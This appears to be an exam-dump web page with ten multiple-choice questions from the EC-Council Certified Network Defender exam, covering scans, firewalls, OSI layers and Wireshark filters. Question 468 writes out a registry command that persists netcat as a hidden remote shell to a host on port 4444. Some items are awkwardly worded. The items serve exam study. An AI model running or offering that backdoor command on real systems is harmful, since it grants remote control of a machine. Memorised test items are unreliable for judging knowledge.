312-38 Exam Details

  • Exam Code
    :312-38
  • Exam Name
    :EC-Council Certified Network Defender (CND)
  • Certification
    :EC-COUNCIL Certifications
  • Vendor
    :EC-COUNCIL
  • Total Questions
    :653 Q&As
  • Last Updated
    :May 29, 2026

EC-COUNCIL 312-38 Online Questions & Answers

  • Question 461:

    Fill in the blank with the appropriate file system. Alternate Data Streams (ADS) is a feature of the file system, allowing more than one data stream to be associated with a filename.

  • Question 462:

    You are using Wireshark to monitor your network traffic and you see a lot of packages with the FIN, PUSH and URG flags activated; what can you infer about this behavior?

    A. The Layer 3 Controls are activated in the Switches
    B. The Spanning Tree Protocol is activated in the Switches
    C. One NIC is broadcasting erroneous traffic
    D. An attacker is running a XMAS scan against the network

  • Question 463:

    Which of the following statements best describes the consequences of a disaster recovery test?

    A. None
    B. The test results should be kept secret.
    C. If no deficiencies were found during the test, so the plan is probably perfect.
    D. If no deficiencies were found during the test, the test was probably erroneous.
    E. The plan should not change any of the test results would be.

  • Question 464:

    Peter, a malicious hacker obtains e-mail addresses by collecting them messages, blogs, DNS lists and Web pages. Then he will send a large number of unsolicited commercial e-mail (UCE) messages to these addresses. What Peter at the following e-mail committing crimes?

    A. E-Mail storm
    B. E-Mail bombing
    C. spam
    D. E-Mail scam
    E. None

  • Question 465:

    How many layers are present in the OSI layer model?

    A. 5
    B. 4
    C. 7
    D. 9

  • Question 466:

    If there is a fire incident caused by an electrical appliance short-circuit, which fire suppressant should be used to control it?

    A. Water
    B. Wet chemical
    C. Dry chemical
    D. Raw chemical

  • Question 467:

    Sam, a network administrator, is using Wireshark to monitor the network traffic of the organization. He wants to detect TCP packets with no flag set to check for a specific attack attempt. Which filter will he use to view the traffic?

    A. tcp.flags==0x000
    B. tcp.flags==x0000
    C. tcp.flags==000x0
    D. tcp.flags==0000x

  • Question 468:

    You run the following command on the remote Windows server 2003 computer:

    c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e

    cmd.exe"

    What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.

    A. You want to perform banner grabbing.
    B. You want to put Netcat in the stealth mode.
    C. You want to add the Netcat command to the Windows registry.
    D. You want to set the Netcat to execute command any time.

  • Question 469:

    Which of the following tools examines a system for a number of known weaknesses and alerts the administrator?

    A. Nessus
    B. COPS
    C. SATAN
    D. SAINT

  • Question 470:

    Which of the following firewalls are used to track the state of active connections and determine the network packets allowed to enter through the firewall? Each correct answer represents a complete solution. Choose all that apply.

    A. Circuit-level gateway
    B. Stateful
    C. Proxy server
    D. Dynamic packet-filtering

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 312-38 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.